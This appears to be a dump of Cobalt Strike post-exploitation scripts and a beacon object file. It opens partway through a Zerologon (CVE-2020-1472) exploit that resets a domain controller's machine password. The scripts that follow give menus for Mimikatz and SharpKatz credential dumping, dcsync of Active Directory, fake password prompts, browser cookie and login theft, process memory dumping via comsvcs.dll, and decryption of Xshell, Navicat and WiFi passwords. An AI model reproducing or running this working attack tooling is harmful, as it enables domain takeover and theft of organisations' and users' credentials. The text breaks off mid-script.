DWORD i; 42 | NETLOGON_CREDENTIAL ClientCh = {0}; 43 | NETLOGON_CREDENTIAL ServerCh = {0}; 44 | NETLOGON_AUTHENTICATOR Auth = {0}; 45 | NETLOGON_AUTHENTICATOR AuthRet = {0}; 46 | NL_TRUST_PASSWORD NewPass = {0}; 47 | ULONG NegotiateFlags = 0x212fffff; 48 | 49 | datap parser; 50 | wchar_t * dc_fqdn; /* DC.corp.acme.com */ 51 | wchar_t * dc_netbios; /* DC */ 52 | wchar_t * dc_account; /* DC$ */ 53 | 54 | /* extract our arguments */ 55 | BeaconDataParse(&parser, args, alen); 56 | dc_fqdn = (wchar_t *)BeaconDataExtract(&parser, NULL); 57 | dc_netbios = (wchar_t *)BeaconDataExtract(&parser, NULL); 58 | dc_account = (wchar_t *)BeaconDataExtract(&parser, NULL); 59 | 60 | for (i = 0; i < 2000; i++) { 61 | NETAPI32$I_NetServerReqChallenge(dc_fqdn, dc_netbios, &ClientCh, &ServerCh); 62 | if ((NETAPI32$I_NetServerAuthenticate2(dc_fqdn, dc_account, ServerSecureChannel, dc_netbios, &ClientCh, &ServerCh, &NegotiateFlags) == 0)) { 63 | if (NETAPI32$I_NetServerPasswordSet2(dc_fqdn, dc_account, ServerSecureChannel, dc_netbios, &Auth, &AuthRet, &NewPass) == 0) { 64 | BeaconPrintf(CALLBACK_OUTPUT, "Success! Use pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync", dc_account); 65 | } 66 | else { 67 | BeaconPrintf(CALLBACK_ERROR, "Failed to set machine account pass for %S", dc_account); 68 | } 69 | 70 | return; 71 | } 72 | } 73 | 74 | BeaconPrintf(CALLBACK_ERROR, "%S is not vulnerable", dc_fqdn); 75 | } 76 | -------------------------------------------------------------------------------- /scripts/DefenderAV.cna: -------------------------------------------------------------------------------- 1 | item "清除所有RunMRU记录"{ 2 | local ('$bid') 3 | foreach $bid ($1){ 4 | bexecute_assembly($1, script_resource('/exe/CleanRunMRU.exe'), "clearall"); 5 | } 6 | } 7 | item "阻止第三方DLL注入"{ 8 | local ('$bid') 9 | foreach $bid ($1){ 10 | bblockdlls($1); 11 | } 12 | } 13 | -------------------------------------------------------------------------------- /scripts/Initial_Access.cna: -------------------------------------------------------------------------------- 1 | menu "Seatbelt"{ 2 | item "All In One"{ 3 | local ('$bid'); 4 | foreach $bid ($1){ 5 | seatbeltall($bid); 6 | } 7 | } 8 | item "RDPSessions"{ 9 | local ('$bid'); 10 | foreach $bid ($1){ 11 | bexecute_assembly($1,script_resource('/exe/Seatbelt.exe'),'RDPSessions'); 12 | } 13 | } 14 | #多选 15 | item "谷歌|火狐浏览器记录"{ 16 | local ('$bid'); 17 | foreach $bid ($1){ 18 | bexecute_assembly($1,script_resource('/exe/Seatbelt.exe'),'ChromiumHistory FirefoxHistory IEUrls ChromiumPresence'); 19 | } 20 | } 21 | item "GetMasterKeys"{ 22 | local ('$bid'); 23 | foreach $bid ($1){ 24 | bexecute_assembly($1,script_resource('/exe/Seatbelt.exe'),'DpapiMasterKeys'); 25 | } 26 | } 27 | item "登录日志"{ 28 | local ('$bid'); 29 | foreach $bid ($1){ 30 | bexecute_assembly($1,script_resource('/exe/Seatbelt.exe'),'LogonEvents'); 31 | } 32 | } 33 | item "登录Session"{ 34 | local ('$bid'); 35 | foreach $bid ($1){ 36 | bexecute_assembly($1,script_resource('/exe/Seatbelt.exe'),'LogonSessions'); 37 | } 38 | } 39 | item "网络共享"{ 40 | local ('$bid'); 41 | foreach $bid ($1){ 42 | bexecute_assembly($1,script_resource('/exe/Seatbelt.exe'),'NetworkShares'); 43 | } 44 | } 45 | item "OracleSQLDeveloper"{ 46 | local ('$bid'); 47 | foreach $bid ($1){ 48 | bexecute_assembly($1,script_resource('/exe/Seatbelt.exe'),'OracleSQLDeveloper'); 49 | } 50 | } 51 | item "PuttySessions"{ 52 | local ('$bid'); 53 | foreach $bid ($1){ 54 | bexecute_assembly($1,script_resource('/exe/Seatbelt.exe'),'PuttySessions'); 55 | } 56 | } 57 | item "TcpConnections"{ 58 | local ('$bid'); 59 | foreach $bid ($1){ 60 | bexecute_assembly($1,script_resource('/exe/Seatbelt.exe'),'TcpConnections'); 61 | } 62 | } 63 | } 64 | 65 | #Mimikatz 66 | menu "Mimikatz"{ 67 | item "List Tokens"{ 68 | local ('$bid'); 69 | foreach $bid ($1){ 70 | bmimikatz($1, "token::list"); 71 | } 72 | } 73 | item "List Admin Tokens"{ 74 | local ('$bid'); 75 | foreach $bid ($1){ 76 | bmimikatz($1, "token::list /admin"); 77 | } 78 | } 79 | item "Domain Admin Tokens"{ 80 | local ('$bid'); 81 | foreach $bid ($1){ 82 | bmimikatz($1, "token::list /domainadmin"); 83 | } 84 | } 85 | } 86 | 87 | # 钓用户密码 88 | menu "Phishing User"{ 89 | item "pickl3"{ 90 | local('$bid'); 91 | foreach $bid ($1){ 92 | #dll反射加载 93 | bdllspawn($1, script_resource("/exe/pickl3_reflective_dll_x64.dll"), $1, "pickl3", 5000, false); 94 | } 95 | } 96 | item "credphisher"{ 97 | local('$bid'); 98 | foreach $bid ($1){ 99 | bexecute_assembly($1, script_resource('/exe/CredPhisher.exe'), '"Please Enter Your Password"'); 100 | } 101 | } 102 | item "锁屏"{ 103 | local('$bid'); 104 | foreach $bid ($1){ 105 | bexecute_assembly($1, script_resource('/exe/locksreen.exe')); 106 | } 107 | } 108 | 109 | } 110 | 111 | ###################### 112 | #子函数 113 | ############### 114 | sub seatbeltall{ 115 | bexecute_assembly($1, script_resource('/exe/Seatbelt.exe'), "-group=all -full"); 116 | } -------------------------------------------------------------------------------- /scripts/Lateral-Movement.cna: -------------------------------------------------------------------------------- 1 | menu "Rubeus"{ 2 | 3 | } -------------------------------------------------------------------------------- /scripts/PasswordDump.cna: -------------------------------------------------------------------------------- 1 | item "Powershell Dump"{ 2 | local ('$bid'); 3 | foreach $bid ($1){ 4 | &powershelldump($bid); 5 | } 6 | } 7 | item "GetClearPass"{ 8 | local ('$bid'); 9 | foreach $bid ($1){ 10 | # &getpass($bid); 11 | &coffee(&bid); 12 | } 13 | } 14 | item "Dump域内主机hash"{ 15 | local('$bid'); 16 | foreach $bid ($1){ 17 | sharpsecdump($bid); 18 | } 19 | } 20 | item "GetGuid"{ 21 | local('$bid'); 22 | foreach $bid ($1){ 23 | getMachineGuid($bid); 24 | } 25 | } 26 | item "提取域内组策略中的帐户凭据"{ 27 | local('$bid'); 28 | foreach $bid ($1){ 29 | bexecute_assembly($1, script_resource("/exe/Net-GPPPassword.exe"), ""); 30 | } 31 | } 32 | 33 | menu "浏览器解密" { 34 | item "360 SafeBrowsergetpass"{ 35 | $bid = $1['@']; 36 | SafeBrowsergetpass($bid); 37 | getMachineGuid($bid); 38 | } 39 | } 40 | menu "内网服务解密"{ 41 | item "Xshell一把梭"{ 42 | local('$bid'); 43 | foreach $bid ($1){ 44 | xshell($bid); 45 | } 46 | } 47 | item "Navicat"{ 48 | local('$bid'); 49 | foreach $bid ($1){ 50 | bexecute_assembly($bid,script_resource("/exe/Xshell.exe"),"-Navicat") 51 | } 52 | } 53 | } 54 | 55 | menu "Web凭据"{ 56 | item "Cookies/History/Logins"{ 57 | local('$bid'); 58 | foreach $bid ($1){ 59 | sharpchromeall($bid); 60 | } 61 | } 62 | 63 | item "List Browser Cookies"{ 64 | local('$bid'); 65 | foreach $bid ($1){ 66 | sharpchromecookies($bid); 67 | } 68 | } 69 | 70 | item "List User's History"{ 71 | local('$bid'); 72 | foreach $bid ($1){ 73 | sharphistory($bid); 74 | } 75 | } 76 | 77 | item "List Login Passwords"{ 78 | local('$bid'); 79 | foreach $bid ($1){ 80 | sharplogins($bid); 81 | } 82 | } 83 | } 84 | 85 | menu "Mimikatz" { 86 | item "Logon Passwords"{ 87 | local('$bid'); 88 | foreach $bid ($1){ 89 | logonpasswords($bid); 90 | } 91 | } 92 | item "3389解密"{ 93 | local('$bid'); 94 | foreach $bid ($1){ 95 | rdp($bid); 96 | } 97 | } 98 | item "WDigest Credentials"{ 99 | local('$bid'); 100 | foreach $bid ($1){ 101 | wdigest($bid); 102 | } 103 | } 104 | item "Kerberos Credentials"{ 105 | local('$bid'); 106 | foreach $bid ($1){ 107 | kerberos($bid); 108 | } 109 | } 110 | item "MSV LM & NTLM Passwords"{ 111 | local('$bid'); 112 | foreach $bid ($1){ 113 | msv($bid); 114 | } 115 | } 116 | item "TsPkg Passwords"{ 117 | local('$bid'); 118 | foreach $bid ($1){ 119 | tspkg($bid); 120 | } 121 | } 122 | item "LiveSSP passwords"{ 123 | local('$bid'); 124 | foreach $bid ($1){ 125 | livessp($bid); 126 | } 127 | } 128 | item "SSP passwords"{ 129 | local('$bid'); 130 | foreach $bid ($1){ 131 | ssp($bid); 132 | } 133 | } 134 | 135 | item "Dump Trust"{ 136 | local('$bid'); 137 | foreach $bid ($1){ 138 | trust($bid); 139 | } 140 | } 141 | 142 | item "Backup Keys"{ 143 | local('$bid'); 144 | foreach $bid ($1){ 145 | backupkeys($bid); 146 | } 147 | } 148 | 149 | item "Mimikatz Tickets"{ 150 | local('$bid'); 151 | foreach $bid ($1){ 152 | tickets($bid); 153 | } 154 | } 155 | 156 | item "Mimikatz ekeys"{ 157 | local('$bid'); 158 | foreach $bid ($1){ 159 | ekeys($bid); 160 | } 161 | } 162 | 163 | item "Mimikatz DPAPI"{ 164 | local('$bid'); 165 | foreach $bid ($1){ 166 | dpapi($bid); 167 | } 168 | } 169 | 170 | item "Mimikatz DPAPI System Secret"{ 171 | local('$bid'); 172 | foreach $bid ($1){ 173 | dpapisystem($bid); 174 | } 175 | } 176 | 177 | item "Mimikatz Credential Manager"{ 178 | local('$bid'); 179 | foreach $bid ($1){ 180 | credman($bid); 181 | } 182 | } 183 | 184 | } 185 | 186 | ################################################# 187 | 188 | # SharpKatz 189 | 190 | ################################################# 191 | 192 | menu "SharpKatz"{ 193 | # SharpKatz Debug Privilege 194 | item "Logon Passwords"{ 195 | local('$bid'); 196 | foreach $bid ($1){ 197 | sklogonpasswords($bid); 198 | } 199 | } 200 | item "WDigest Credentials"{ 201 | local('$bid'); 202 | foreach $bid ($1){ 203 | skwdigest($bid); 204 | } 205 | } 206 | item "Kerberos Credentials"{ 207 | local('$bid'); 208 | foreach $bid ($1){ 209 | skkerberos($bid); 210 | } 211 | } 212 | item "MSV LM & NTLM Passwords"{ 213 | local('$bid'); 214 | foreach $bid ($1){ 215 | skmsv($bid); 216 | } 217 | } 218 | item "TsPkg Passwords"{ 219 | local('$bid'); 220 | foreach $bid ($1){ 221 | sktspkg($bid); 222 | } 223 | } 224 | item "SharpKatz ekeys"{ 225 | local('$bid'); 226 | foreach $bid ($1){ 227 | skekeys($bid); 228 | } 229 | } 230 | item "Credential Manager"{ 231 | local('$bid'); 232 | foreach $bid ($1){ 233 | skcredman($bid); 234 | } 235 | } 236 | item "Dump User Credential By Username"{ 237 | local('$bid'); 238 | foreach $bid ($1){ 239 | skdcsyncusername($bid); 240 | } 241 | } 242 | item "Dump User Credential By GUID"{ 243 | local('$bid'); 244 | foreach $bid ($1){ 245 | skdcsyncguid($bid); 246 | } 247 | } 248 | item "Export Entire Dataset From AD"{ 249 | local('$bid'); 250 | foreach $bid ($1){ 251 | skdcsyncdataset($bid); 252 | } 253 | } 254 | } 255 | item "Dumpert" { 256 | local('$bid'); 257 | foreach $bid ($1){ 258 | dumpert($bid); 259 | } 260 | 261 | } 262 | 263 | menu "MISC"{ 264 | item "Dump SysInternals AutoLogon密码"{ 265 | local('$bid'); 266 | foreach $bid ($1){ 267 | bexecute_assembly($1, script_resource('exe/DecryptAutoLogon.exe')); 268 | } 269 | } 270 | item "WIFI密码Dump"{ 271 | local('$bid'); 272 | foreach $bid ($1){ 273 | bexecute_assembly($1, script_resource('exe/SharpWifiGrabber.exe')); 274 | } 275 | } 276 | } 277 | ############################### 278 | ## 279 | ## Mimikatz func 280 | ## 281 | ############################## 282 | 283 | sub getpass{ 284 | $args = substr($0, 6); 285 | bdllspawn($1, script_resource("dll/clearpass.x64.dll"),$args, "QAX", 5000, false); 286 | } 287 | 288 | sub coffee{ 289 | # $args = substr($0, 6); 290 | bdllspawn($1, script_resource("dll/powerkatz_x64.dll"),"coffee", "QAX", 5000, false); 291 | } 292 | 293 | sub logonpasswords{ 294 | 295 | bmimikatz($1, "sekurlsa::logonpasswords"); 296 | 297 | } 298 | sub wdigest{ 299 | 300 | bmimikatz($1, "sekurlsa::wdigest"); 301 | 302 | } 303 | sub kerberos{ 304 | 305 | bmimikatz($1, "sekurlsa::kerberos"); 306 | 307 | } 308 | sub msv{ 309 | 310 | bmimikatz($1, "sekurlsa::msv"); 311 | 312 | } 313 | sub tspkg{ 314 | 315 | bmimikatz($1, "sekurlsa::tspkg"); 316 | 317 | } 318 | sub livessp{ 319 | 320 | bmimikatz($1, "sekurlsa::livessp"); 321 | 322 | } 323 | sub ssp{ 324 | 325 | bmimikatz($1, "sekurlsa::ssp"); 326 | 327 | } 328 | 329 | 330 | sub trust{ 331 | 332 | bmimikatz($1, "sekurlsa::trust"); 333 | 334 | } 335 | sub backupkeys{ 336 | 337 | bmimikatz($1, "sekurlsa::backupkeys"); 338 | 339 | } 340 | sub tickets{ 341 | 342 | bmimikatz($1, "sekurlsa::tickets"); 343 | 344 | } 345 | sub ekeys{ 346 | 347 | bmimikatz($1, "sekurlsa::ekeys"); 348 | 349 | } 350 | 351 | sub dpapi{ 352 | 353 | bmimikatz($1, "sekurlsa::dpapi"); 354 | 355 | } 356 | 357 | sub dpapisystem{ 358 | 359 | bmimikatz($1, "sekurlsa::dpapi"); 360 | 361 | } 362 | 363 | sub credman{ 364 | 365 | bmimikatz($1, "sekurlsa::credman"); 366 | 367 | } 368 | sub 3rdp{ 369 | bmimikatz($1, "vault::cred /patch"); 370 | } 371 | sub sharpchromeall{ 372 | bexecute_assembly($1, script_resource('/exe/SharpChromium.exe'), "all"); 373 | } 374 | ######End of all the things 375 | 376 | ###Grab all the Cookies 377 | 378 | sub sharpchromecookies{ 379 | bexecute_assembly($1, script_resource('/exe/SharpChromium.exe'), "cookies"); 380 | } 381 | ######End of all the cookies 382 | 383 | ###Grab History 384 | 385 | sub sharphistory{ 386 | bexecute_assembly($1, script_resource('/exe/SharpChromium.exe'), "history"); 387 | } 388 | ######End Cookie History Function 389 | 390 | 391 | ###Grab Login Info 392 | sub sharplogins{ 393 | bexecute_assembly($1, script_resource('/exe/SharpChromium.exe'), "logins"); 394 | } 395 | 396 | sub sharpsecdump{ 397 | $bid = $1; 398 | $dialog = dialog("SharpSecDump", %(target => "", username => "", password => "", domain => "", execmethod => "Execute-Assembly"), lambda({ 399 | $cmdargs = ""; 400 | $cmdargs = "-target=$3['target'] -u=$3['username'] -p=$3['password'] -d=$3['domain']"; 401 | if ($3["execmethod"] eq "Execute-Assembly"){ 402 | btask($bid, 'Grabbing those MF Secrets!'); 403 | bexecute_assembly($bid, script_resource('/exe/SharpSecDump.exe'), $cmdargs); 404 | } 405 | })); 406 | dialog_description($dialog, "SharpSecDump"); 407 | drow_text($dialog, "target", "主机名或IP:"); 408 | drow_text($dialog, "username", "用户名:"); 409 | drow_text($dialog, "password", "密码:"); 410 | drow_text($dialog, "domain", "输入完整域名:"); 411 | dbutton_action($dialog, "Execute"); 412 | dialog_show($dialog); 413 | } 414 | 415 | sub powershelldump{ 416 | local('$dialog %defaults $bid'); 417 | $bid = $1; 418 | $ptype = "elevatedregistrykey"; 419 | 420 | %defaults["pid"] = "1314"; 421 | %defaults["path"] = "C:\\log.dump"; 422 | # %defaults["droplocation"] = %persistdefaults["droplocation"]; 423 | # %defaults["customfile"] = %persistdefaults["customfile"]; 424 | # %defaults["listener"] = %persistdefaults["listener"]; 425 | # %defaults["template"] = %persistdefaults["template"]; 426 | 427 | $dialog = dialog("powershell dump 进程", %defaults, lambda({ 428 | bpowershell($bid, "rundll32 C:\\windows\\system32\\comsvcs.dll, MiniDump ".$3["pid"]." ".$3["path"]. " full") 429 | }, \$bid, \$3) 430 | ); 431 | dialog_description($dialog, "powershell dump 进程"); 432 | drow_text($dialog, "pid", "PID: "); 433 | drow_text($dialog, "path", "Dump PATH: "); 434 | dbutton_action($dialog, "Execute"); 435 | dialog_show($dialog); 436 | } 437 | 438 | ################################################# 439 | 440 | # SharpKatz 441 | 442 | ################################################# 443 | 444 | sub sklogonpasswords{ 445 | 446 | bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command logonpasswords"); 447 | 448 | } 449 | 450 | 451 | sub skwdigest{ 452 | 453 | bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command wdigest"); 454 | 455 | } 456 | 457 | 458 | sub skkerberos{ 459 | 460 | bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command kerberos"); 461 | 462 | } 463 | 464 | 465 | sub skmsv{ 466 | 467 | bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command msv"); 468 | 469 | } 470 | 471 | 472 | sub sktspkg{ 473 | 474 | bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command tspkg"); 475 | 476 | } 477 | 478 | 479 | sub skekeys{ 480 | 481 | bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command ekeys"); 482 | 483 | } 484 | 485 | 486 | sub skcredman{ 487 | 488 | bexecute_assembly($1, script_resource('/exe/SharpKatz.exe'), "--Command credman"); 489 | 490 | } 491 | 492 | sub skdcsyncusername{ 493 | $bid = $1; 494 | $dialog = dialog("SharpKatz Dump Credential By Username", %(username => "", fqdn => "", dc => "", execmethod => "Execute-Assembly"), lambda({ 495 | $cmdargs = ""; 496 | $cmdargs = "--Command dcsync --User $3['username'] --Domain $3['fqdn'] --DomainController $3['dc'] /ptt"; 497 | if ($3["execmethod"] eq "Execute-Assembly"){ 498 | btask($bid, 'Dumping Creds...'); 499 | bexecute_assembly($bid, script_resource('exe/SharpKatz.exe'), $cmdargs); 500 | } 501 | })); 502 | dialog_description($dialog, "Enumerate Remote Hosts with Seatbelt"); 503 | drow_text($dialog, "username", "Please Enter the username:"); 504 | drow_text($dialog, "fqdn", "Please Enter the FQDN:"); 505 | drow_text($dialog, "dc", "Please Enter the FQDN of the Domain Controller:"); 506 | dbutton_action($dialog, "Execute"); 507 | dialog_show($dialog); 508 | 509 | } 510 | 511 | sub skdcsyncguid{ 512 | $bid = $1; 513 | $dialog = dialog("SharpKatz Dump Credential By GUID", %(guid => "", fqdn => "", dc => "", execmethod => "Execute-Assembly"), lambda({ 514 | $cmdargs = ""; 515 | $cmdargs = "--Command dcsync --Guid $3['guid'] --Domain $3['fqdn'] --DomainController $3['dc'] /ptt"; 516 | if ($3["execmethod"] eq "Execute-Assembly"){ 517 | btask($bid, 'Dumping Creds...'); 518 | bexecute_assembly($bid, script_resource('exe/SharpKatz.exe'), $cmdargs); 519 | } 520 | })); 521 | dialog_description($dialog, "Enumerate Remote Hosts with Seatbelt"); 522 | drow_text($dialog, "guid", "Please Enter A GUID:"); 523 | drow_text($dialog, "fqdn", "Please Enter the FQDN:"); 524 | drow_text($dialog, "dc", "Please Enter the FQDN of the Domain Controller:"); 525 | dbutton_action($dialog, "Execute"); 526 | dialog_show($dialog); 527 | 528 | } 529 | 530 | sub skdcsyncdataset{ 531 | $bid = $1; 532 | $dialog = dialog("SharpKatz Dump Entire Dataset From AD", %(fqdn => "", dc => "", execmethod => "Execute-Assembly"), lambda({ 533 | $cmdargs = ""; 534 | $cmdargs = "--Command dcsync --Domain $3['fqdn'] --DomainController $3['dc'] /ptt"; 535 | if ($3["execmethod"] eq "Execute-Assembly"){ 536 | btask($bid, 'Dumping Creds...'); 537 | bexecute_assembly($bid, script_resource('exe/SharpKatz.exe'), $cmdargs); 538 | } 539 | })); 540 | dialog_description($dialog, "Enumerate Remote Hosts with Seatbelt"); 541 | drow_text($dialog, "fqdn", "Please Enter the FQDN:"); 542 | drow_text($dialog, "dc", "Please Enter the FQDN of the Domain Controller:"); 543 | dbutton_action($dialog, "Execute"); 544 | dialog_show($dialog); 545 | 546 | } 547 | 548 | ################################# 549 | #Wing 550 | ############ 551 | 552 | sub xshell{ 553 | local('$dialog %defaults $bid'); 554 | $bid = $1; 555 | $ptype = "elevatedregistrykey"; 556 | 557 | %defaults["uid"] = "1314"; 558 | %defaults["path"] = "\"\""; 559 | # %defaults["droplocation"] = %persistdefaults["droplocation"]; 560 | # %defaults["customfile"] = %persistdefaults["customfile"]; 561 | # %defaults["listener"] = %persistdefaults["listener"]; 562 | # %defaults["template"] = %persistdefaults["template"]; 563 | 564 | $dialog = dialog("Xshell一把梭", %defaults, lambda({ 565 | bexecute_assembly($bid,script_resource("/exe/Xshell.exe")," -Xshell ".$3["path"]." ".$3["uid"]) 566 | }, \$bid, \$3) 567 | ); 568 | dialog_description($dialog, "Xshell 5,6,7一把梭"); 569 | drow_text($dialog, "path", "Session PATH(默认为空): "); 570 | drow_text($dialog, "uid", "username+sid: "); 571 | dbutton_action($dialog, "Execute"); 572 | dialog_show($dialog); 573 | } 574 | 575 | 576 | 577 | 578 | sub getMachineGuid{ 579 | $arch = barch($1); 580 | if ($arch == 'x64'){ 581 | breg_queryv($1, "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid", "x64"); 582 | } 583 | else{ 584 | breg_queryv($1, "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid", "x86"); 585 | breg_queryv($1, "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid", "x64"); 586 | } 587 | } 588 | 589 | sub getMachineGuid{ 590 | $arch = barch($1); 591 | if ($arch == 'x64'){ 592 | breg_queryv($1, "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid", "x64"); 593 | } 594 | else{ 595 | breg_queryv($1, "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid", "x86"); 596 | breg_queryv($1, "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography", "MachineGuid", "x64"); 597 | } 598 | } 599 | 600 | sub SafeBrowsergetpass { 601 | bshell($bid, 'reg query HKEY_CLASSES_ROOT\360seURL\shell\open\command|findstr exe'); 602 | } 603 | 604 | # popup beacon_bottom { 605 | # item "SafeBrowsergetpass"{ 606 | # $bid = $1['@']; 607 | # SafeBrowsergetpass($bid); 608 | # getMachineGuid($bid); 609 | # } 610 | # } 611 | 612 | on beacon_output { 613 | $magicstring = "360se6\\Application\\360se.exe"; 614 | $magicstring2 = "MachineGuid"; 615 | 616 | if ($magicstring isin $2){ 617 | $length = strlen($2); 618 | $last = lindexOf($2, ":"); 619 | $res = substr($2, $last - 1, $length - 32); 620 | $dbPath = "User Data\\Default\\apps\\LoginAssis\\assis2.db"; 621 | $res = $res . $dbPath; 622 | 623 | bdownload($1, $res); 624 | blog($1,"360 SafeBrowser DB Downloading"); 625 | } 626 | 627 | if ($magicstring2 isin $2){ 628 | $lasta = lindexOf($2, "\nMachineGuid"); 629 | $MachineGuid = substr($2, $lasta + 26, -1); 630 | $beaconHost = beacon_info($1, "host"); 631 | credential_add($empty,$MachineGuid, $empty, $empty, $beaconHost); 632 | blog($1,"MachineGuid Get Success"); 633 | } 634 | } 635 | -------------------------------------------------------------------------------- /scripts/Privilege.cna: -------------------------------------------------------------------------------- 1 | item "Watson快速找补丁"{ 2 | local('$bid'); 3 | foreach $bid ($1){ 4 | bexecute_assembly($bid script_resource('/exe/Watson.exe')); 5 | } 6 | } -------------------------------------------------------------------------------- /scripts/README.md: -------------------------------------------------------------------------------- 1 | #这个目录 -------------------------------------------------------------------------------- /scripts/bof/zerologon.cna: -------------------------------------------------------------------------------- 1 | alias zerologon { 2 | local('$bid $barch $fqdn $netbios $args $safew'); 3 | ($bid, $safew, $fqdn) = @_; 4 | $netbios = split("\\.", $fqdn)[0]; 5 | 6 | # figure out the arch of this session 7 | $barch = barch($1); 8 | 9 | # read in the right BOF file 10 | $handle = openf(script_resource("bof/zerologon. $+ $barch $+ .o")); 11 | $data = readb($handle, -1); 12 | closef($handle); 13 | 14 | # build our arguments 15 | $args = bof_pack($1, "ZZZ", $fqdn, $netbios, $netbios . '$'); 16 | 17 | # safety check. 18 | if ($safew ne "iunderstand") { 19 | berror($1, "zerologon aborted! Type help zerologon and read first."); 20 | return; 21 | } 22 | 23 | # announce what we're doing 24 | btask($1, "Reset $netbios $+ \$ machine account via CVE-2020-1472"); 25 | 26 | # execute it. 27 | beacon_inline_execute($1, $data, "go", $args); 28 | } 29 | 30 | beacon_command_register( 31 | "zerologon", 32 | "Reset DC machine account password with CVE-2020-1472", 33 | "Synopsis: zerologon [safeword] [DC.fqdn]\n\nReset the machine account password for a domain controller with the\nZerologon exploit. \n\nThis exploit will break the functionality of this domain controller.\n\c4Don't use in production.\o Use \c0iunderstand\o as the safe word parameter\nto acknowledge that you read this."); 34 | -------------------------------------------------------------------------------- /scripts/cmd/AV.cna: -------------------------------------------------------------------------------- 1 | #AntiVirus Query 2 | #Author: @r3dQu1nn 3 | #Queries the Registry for AV installed 4 | #Thanks to @i_am_excite and @merrillmatt011 for the help 5 | #Props to @zerosum0x0 for the wmic find! 6 | 7 | #Long ass one-liner :) 8 | $powershellcmd = "\$av_list = @(\"BitDefender\", \"Kaspersky\", \"McAfee\", \"Norton\", \"Avast\", \"WebRoot\", \"AVG\", \"ESET\", \"Malware\", \"Windows Defender\");\$av_install = Get-ItemProperty HKLM:\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$av_install1 = Get-ItemProperty HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\*;\$regkey = 'HKLM:\\SOFTWARE\\Microsoft\\Windows Defender\\Signature Updates\\';\$av_loop2 = foreach (\$av1 in \$av_list){foreach (\$key in \$av_install){if (\$key.DisplayName -match \$av1 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key.DisplayName.ToString(), \$key.DisplayVersion.ToString(), \$key.InstallDate.ToString()}}}};\$proc_temp = Get-Process;\$av_loop = foreach (\$av in \$av_list){foreach (\$zz in \$proc_temp){if (\$zz.path -match \$av -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$zz.Id.ToString(), \$zz.Name.Split('\"')[0], \$zz.Path.ToString()}}}};\$av_loop3 = foreach (\$av2 in \$av_list){foreach (\$key1 in \$av_install1){if (\$key1.DisplayName -match \$av2 -eq \$TRUE){% {\"{0}|{1}|{2}\" -f \$key1.DisplayName.ToString(), \$key1.DisplayVersion.ToString(), \$key1.InstallDate.ToString()}}}};Write-Output \"`nPID|Name|Path`n\";Write-Output \$av_loop;Write-Output \"`nWindows Defender AV Signature Version:\";(Get-ItemProperty -Path \$regkey).ASSignatureVersion;Write-Output \"`nAV Name|Version|Install Date`n\";Write-Output \$av_loop2;Write-Output \$av_loop3"; 9 | 10 | #AV_Query Command Register 11 | beacon_command_register("AV", "查询杀软列表", 12 | "Syntax: AV_Query\n" . 13 | "Checks HKLM hive for All AntiVirus installed"); 14 | 15 | #AV_Query alias 16 | alias AV{ 17 | blog($1, "\cBDetermining what AntiVirus is installed..."); 18 | bpowerpick!($1, $powershellcmd); 19 | bpause($1, int(30000)); 20 | bpowerpick!($1, "Get-WmiObject -Namespace \"root\\SecurityCenter2\" -Query \"SELECT * FROM AntiVirusProduct\" | select-object displayName,pathToSignedReportingExe,timestamp| fl"); 21 | 22 | } 23 | -------------------------------------------------------------------------------- /scripts/cmd/FilesColor.cna: -------------------------------------------------------------------------------- 1 | # 2 | # Color Coded Files Listing. 3 | # 4 | # A nice script that colorizes your `ls` output and keeps track of uploaded files 5 | # to let you highlight them. 6 | # 7 | # Be wary of additional performance hit when listing big directories imposed by 8 | # their listing processing, coloring and sorting that this script does. 9 | # 10 | # Based on the original ProcessColor.cna idea by @r3dQu1nn. 11 | # 12 | # Author: 13 | # Mariusz B. / mgeeky, '20 14 | # 15 | # (https://github.com/mgeeky) 16 | # 17 | 18 | global('@UPLOADED_FILE_NAMES $TIMES_TO_DISPLAY_COLORS_SCHEME'); 19 | 20 | @UPLOADED_FILE_NAMES = @(); 21 | $TIMES_TO_DISPLAY_COLORS_SCHEME = 3; 22 | 23 | sub interpretSize { 24 | local('$s $size'); 25 | $s = $1; 26 | 27 | if($s == 0) { 28 | $size = ""; 29 | } 30 | else if($s < 1024) { 31 | $size .= $s . "B"; 32 | } 33 | else if($s < 1024 * 1024) { 34 | $size = round($s / 1024.0, 1); 35 | $size .= "KB"; 36 | } 37 | else if($s < 1024 * 1024 * 1024) { 38 | $size = round(($s / 1024.0) / 1024, 1); 39 | $size .= "MB"; 40 | } 41 | else if($s < 1024 * 1024 * 1024 * 1024) { 42 | $size = round((($s / 1024.0) / 1024) / 1024, 1); 43 | $size .= "GB"; 44 | } 45 | 46 | return $size; 47 | } 48 | 49 | set BEACON_OUTPUT_LS { 50 | local('$totalsize @subl $outls $temp $size $s $ext $dotpos $type $lastmod $name @lines @ls'); 51 | this('$once'); 52 | 53 | @lines = split("\n", ["$2" trim]); 54 | 55 | @configuration = @('config', 'conf', 'json', 'yml', 'xml', 'inf', 'properties', 'settings'); 56 | @sensitive = @('ost', 'dmp', 'sqlite', 'sqlite3', 'kdbx', 'kdb', 'dit', 'kirbi', 'ccache', 'kirbis', 'git'); 57 | @sensitive_files = @('ntds.dit', 'lsass.dmp'); 58 | @archives = @('rar', 'zip', '7z', 'tar', 'gz', 'bz2', 'iso'); 59 | @exes = @('msi', 'sys', 'exe', 'dll', 'bat', 'sct'); 60 | @docs = @('csv', 'odt', 